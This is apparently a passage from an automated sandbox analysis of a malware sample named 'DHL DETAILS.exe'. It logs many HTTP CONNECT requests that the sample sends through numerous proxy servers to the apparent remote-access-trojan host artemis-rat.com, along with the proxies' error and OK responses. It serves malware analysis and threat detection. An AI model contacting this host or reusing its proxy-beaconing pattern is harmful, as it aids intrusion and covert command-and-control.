                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    387192.168.2.551317166.62.38.10024536352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.565186024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.004935980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.489372015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.473721981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.536700964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    388192.168.2.550698117.160.250.138806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.572153091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.245683908 CET303INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 154
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    389192.168.2.551280174.77.111.198495476352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.574891090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    390192.168.2.551191120.76.42.20988886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.574923992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    391192.168.2.551194150.109.243.156156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.575119019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    392192.168.2.551079115.74.157.19110806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.575970888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    393192.168.2.550014176.99.2.4310816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.577617884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.567687035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.568126917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:25.567619085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.677536011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    394192.168.2.551245147.75.92.25194016352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.578269958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.853466988 CET356INHTTP/1.0 502 Bad Gateway
                                                                                    Server: Zscaler/6.3
                                                                                    Content-Type: text/html
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 4e 53 20 65 72 72 6f 72 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 4e 53 20 65 72 72 6f 72 20 28 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 29 3c 62 72 3e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 73 70 65 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 21 2d 2d 5a 73 63 61 6c 65 72 2f 36 2e 33 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    395192.168.2.551331104.16.105.146806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.587443113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.741734982 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    396192.168.2.551029124.160.118.18380806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.588237047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.017083883 CET323INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.8.1
                                                                                    Date: Sun, 10 Mar 2024 00:35:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 172
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.8.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    397192.168.2.551195185.158.114.14256976352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.592116117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    398192.168.2.55002843.255.113.23280816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.593029976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.945935011 CET208INHTTP/1.0 404 Not Found
                                                                                    Server: HCS
                                                                                    Date: Sat, 09 Mar 2024 15:01:39 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 432
                                                                                    HCS-Error: ERR_FTP_NOT_FOUND 0
                                                                                    X-NGAA: MISS from CH-XW-NO1-315.1
                                                                                    Connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    399192.168.2.550985104.248.151.220639976352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.593638897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    400192.168.2.551347188.114.99.37806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.593688011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.747951984 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    401192.168.2.550440107.181.168.14541456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.594309092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    402192.168.2.55124782.113.157.122312806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.599705935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    403192.168.2.55018512.186.205.121806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.602869034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.676913023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.677499056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:25.676976919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.677736044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    404192.168.2.551221114.132.202.7880806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.604103088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.138015032 CET84INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Transfer-Encoding: chunked


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    405192.168.2.55121537.204.157.91418906352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.607032061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.301852942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.182049990 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    406192.168.2.551251211.222.252.18781976352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.607867956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    407192.168.2.55002545.117.179.17965226352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.620099068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.676911116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.677495956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:25.677092075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.677737951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    408192.168.2.551296174.77.111.19741456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.620407104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    409192.168.2.551283121.159.146.251806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.626656055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.925744057 CET310INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 150
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    410192.168.2.551235221.151.181.10180006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.627460957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.372963905 CET536INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
